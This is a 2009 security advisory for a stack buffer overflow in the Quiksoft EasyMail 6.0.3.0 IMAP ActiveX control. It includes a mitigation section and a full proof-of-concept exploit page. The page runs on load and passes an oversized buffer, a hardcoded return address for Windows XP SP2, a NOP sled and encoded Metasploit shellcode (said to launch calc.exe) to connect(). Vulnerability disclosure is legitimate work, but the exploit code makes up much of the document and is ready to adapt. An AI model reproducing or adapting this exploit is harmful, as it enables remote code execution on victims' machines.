Quiksoft EasyMail 6.0.3.0 imap connect() ActiveX stack overflow exploit

<!--

I - TITLE

Security advisory: Quiksoft EasyMail 6.0.3.0 imap connect() ActiveX 
stack overflow exploit

II - SUMMARY

Description: Remotely exploitable buffer overflow in ActiveX component
Quiksoft EasyMail 6.0.3.0 allows for the arbitrary code execution in the
user context.

Author: Sebastian Wolfgarten (sebastian at wolfgarten dot com),
http://www.devtarget.org

Date: September 17th, 2009

Severity: Medium (remote code execution in the user context)

References: http://www.devtarget.org/easymail-advisory-09-2009.txt

III - OVERVIEW

Quote from quiksoft.com: "The EasyMail Products are relied upon by over 
thousands
of international corporations, federal, state and local organizations, 
and individual
developers. Quiksoft has established the EasyMail products as "the 
professional,
reliable, and easy to use choice for e-mail development". More 
information about
the product can be found online at http://www.quiksoft.com.

IV - DETAILS

The software Quiksoft EasyMail 6.0.3.0 ships emimap4.dll, an ActiveX 
component
to facilitate the development of IMAP4-aware applications. The connect() 
function
of this component is prone to a classic buffer overflow vulnerability 
when a
particularly long argument is passed and the application attempts to 
copy that
data into a finite buffer. This allows for the execution of arbitrary 
code in the
user context.

V - MITIGATING MEASURES

Either set the killbit for the relevant ActiveX component 
(clsid:0CEA3FB1-7F88-4803-AA8E-AD021566955D)
or install the latest version of Quiksoft EasyMail which is not 
considered vulnerable.

VI - NOTES

Code below was taken from an exploit originally written by e.b
(see http://www.milw0rm.com/exploits/4825). Thanks also to Francis 
Provencher
for drawing my attention on Quiksoft EasyMail. Shellcode below is rather 
harmless and
executes calc.exe.

Tested on Windows XP SP2 English, IE6, emimap4.dll version 6.0.3.0

-->

<html>
 <head>
  <title>Quiksoft EasyMail 6.0.3.0 imap connect() stack overflow</title>
  <script language="JavaScript" defer>
    function Check() {
     
     var buf = A;
     while (buf.length <= 440) buf = buf + A;


// win32_exec -  EXITFUNC=seh CMD=c:windowssystem32calc.exe Size=378 
Encoder=Alpha2 http://metasploit.com
var shellcode1 = 
unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%49%49%49%49%49%49" +
                          
"%48%49%49%49%49%49%49%49%49%49%49%49%51%5a%6a%43" +
                          
"%58%30%42%31%50%42%41%6b%42%41%53%42%32%42%41%32" +
                          
"%41%41%30%41%41%58%50%38%42%42%75%48%69%6b%4c%4d" +
                          
"%38%63%74%75%50%33%30%67%70%4c%4b%73%75%57%4c%6e" +
                          
"%6b%63%4c%45%55%63%48%33%31%58%6f%6c%4b%70%4f%77" +
                          
"%68%6e%6b%73%6f%71%30%65%51%6a%4b%72%69%4e%6b%36" +
                          
"%54%4e%6b%45%51%4a%4e%46%51%6b%70%4f%69%4c%6c%6e" +
                          
"%64%59%50%73%44%53%37%58%41%7a%6a%54%4d%33%31%78" +
                          
"%42%48%6b%7a%54%77%4b%52%74%66%44%34%44%62%55%59" +
                          
"%75%6e%6b%41%4f%36%44%45%51%6a%4b%53%56%4c%4b%46" +
                          
"%6c%72%6b%4c%4b%53%6f%37%6c%63%31%6a%4b%4e%6b%75" +
                          
"%4c%6c%4b%54%41%48%6b%4d%59%51%4c%51%34%34%44%4a" +
                          
"%63%30%31%6f%30%62%44%4e%6b%71%50%54%70%4b%35%6b" +
                          
"%70%50%78%46%6c%6c%4b%63%70%44%4c%4c%4b%44%30%35" +
                          
"%4c%6e%4d%6c%4b%61%78%55%58%6a%4b%64%49%4e%6b%6b" +
                          
"%30%6c%70%57%70%57%70%47%70%4c%4b%70%68%47%4c%71" +
                          
"%4f%44%71%6b%46%33%50%66%36%4f%79%4c%38%6e%63%4f" +
                          
"%30%71%6b%30%50%41%78%58%70%6c%4a%53%34%51%4f%33" +
                          
"%58%4e%78%39%6e%6d%5a%46%6e%61%47%4b%4f%69%77%63" +
                          
"%53%45%6a%33%6c%72%57%30%69%50%6e%62%44%70%6f%73" +
                          
"%47%41%63%41%4c%50%73%42%59%31%63%50%74%65%35%70" +
                          
"%6d%54%73%65%62%33%6c%30%63%41%71%70%6c%53%53%66" +
                          "%4e%31%75%74%38%70%65%77%70%43");

        var eip = unescape("%0F%DD%17%7D"); // Windows XP SP2 English
    
        var nop = unescape("%90%90%90%90%90%90%90%90%90%90%90%90");

        var m = buf + eip + nop + shellcode1 + nop;
        
        obj.connect(m);
   }
   
   </script>
  </head>
 <body onload="JavaScript: return Check();">
    <object id="obj" classid="clsid:0CEA3FB1-7F88-4803-AA8E-AD021566955D">
     Failed to instantiate object.
    </object>
 </body>
</html>